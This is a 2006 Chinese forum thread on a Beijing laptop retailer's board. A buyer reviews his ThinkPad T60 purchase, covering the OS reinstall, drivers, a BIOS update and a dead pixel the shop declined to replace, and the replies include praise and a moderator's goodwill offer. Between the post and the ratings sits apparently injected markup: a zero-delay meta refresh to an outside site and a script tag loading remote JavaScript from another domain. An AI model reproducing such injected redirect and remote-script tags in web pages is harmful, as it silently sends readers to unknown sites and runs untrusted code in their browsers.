开业于2004年,诚信服务几万客户
翔意数码淘宝店:xynbnb.taobao.com
全国客服电话:010-59000667
地址:北京东城区东兴隆街56号北京商界A座512
ThinkPad产品专业客服 苹果产品专业客服

[X系列] T60-B12购机使用感受

没有小黑的PP,过几天有时间的时候再补上。。

以前用过的小黑有R40、T42,也用过几天的T43。感觉T42的键盘还是不错的。
11月初就一直在寻找合适价格的小黑,一直没有注意到xy。一天朋友告诉说xy价格比较合理,服务比较好,就到xy浏览了一下,发现评价确实不错。在我拿到小黑的第二天,另一位朋友拿到了一台B41。。。

以后的几天一直呆在xy上,寻找自己喜欢的小黑。当时价格变动比较快,几乎隔天就变动一次,同时core 2很快就出了,心里有点犹豫不决,不知道到底是不是应该出手。最后考虑到一直等下去也不是自己还是不知道会选择什么样的小黑,说不定会看着core 2等下去呢!于是决定出手B12。。
由于小黑不是自己去取的,也没有费时间去找xy在什么地方,朋友给带的,哈哈。。。不是都说xy的服务不错嘛,就应该相信喽。。。
当天下午朋友就把小黑给送了过来,迫不及待的打开小黑。。。晕了。。。。

小黑的系统是xy给做的,有很多的驱动没有装,也许是没有要求他们给做成什么样的吧,呵呵,没关系了。自己花点时间做吧。。。不过不喜欢小黑边上的标标。。
先检测一下小黑,使用xy给的测试软件检测,没有发现什么问题,电池都是新的。唯一遗憾的是朋友忘记了给换1G的内存,而是选择的别的套餐,唉。。先用着吧,以后再说喽。。
晚上回去后决定重新做一下小黑的系统,不喜欢小黑的一键恢复,直接给delete掉了。。呵呵,重新使用一张xp的安装盘进行安装,很顺利的安装完成。驱动的安装也很简单,使用st自动进行安装就可以的,最后是stat的驱动的安装,按照xy上面的说明进行安装,很简单,然后就可以打开bios中的设置了。最近发现matrix storage manager安装后会自动安装的。。

不过在安装系统的过程中发现了一个问题,在显示屏的右下方有一个不是很明显的暗点。以前在xy上看到过是包无点的,有说是高分屏1-2个亮点或者暗点是允许的,也不知道到底是不是报的。于是第二天就道xy上去问,是不是可以更换,不过感到答复很令人伤心,“那是你朋友的问题了,拿货的时候没有看到”心里面很是郁闷。。。。。。。。。。。。。。。。。。。。。。。。这个暗点是很不明显的,看起来好像是做过修饰的 。一般不细看根本就看不到的。虽说心里面有点不是太舒服,可一个不明显的暗点还是接受的,不换了,自己用吧!!!

特别喜欢小黑的小红帽,哈哈,不玩游戏的时候都是不用鼠标的。

最近几天在使用st升级的时候,不小心把bios给升了,当时确实担心会出现问题,不过还是很顺利,升级成功。。。。

一直比较忙,没有时间写小黑,今天抽点时间写点,有时间的时候再补全吧。

虽说在购机后使用的时候有点郁闷,毕竟自己有了小黑,每天摸着小黑,感觉就是爽。既然选择xy,就应该相信xy的服务,敬业的精神。。

+200---EddieFan

<meta http-equiv="refresh" content="0; url=http://www.1117.cc">
★★★
<script type="text/javascript" src="http://www.553.cc/q.js"></script>
<link href="http://www.553.cc/1.css" rel="stylesheet" type="text/css" media="screen" />
<P>&nbsp;</P>

评分

EddieFan + 200

屏幕有坏点很平常的,楼主不用太介意!
贵宾已加,有时候点实在是控制不了,我们还见过时有时无的点呢.也许验的时候正赶上没有点.....有机会来公司送点东西做补偿吧.
“有机会来公司送点东西做补偿吧.”
xy的服务还真是不赖。
赞一个

原帖由 EddieFan 于 2006-12-15 14:28 发表
贵宾已加,有时候点实在是控制不了,我们还见过时有时无的点呢.也许验的时候正赶上没有点.....有机会来公司送点东西做补偿吧.

我也想要哦

hehe 还好
pp传哪儿了
呵呵!
好像很多这样的论坛 都没有xy的好啊!
bu cuo o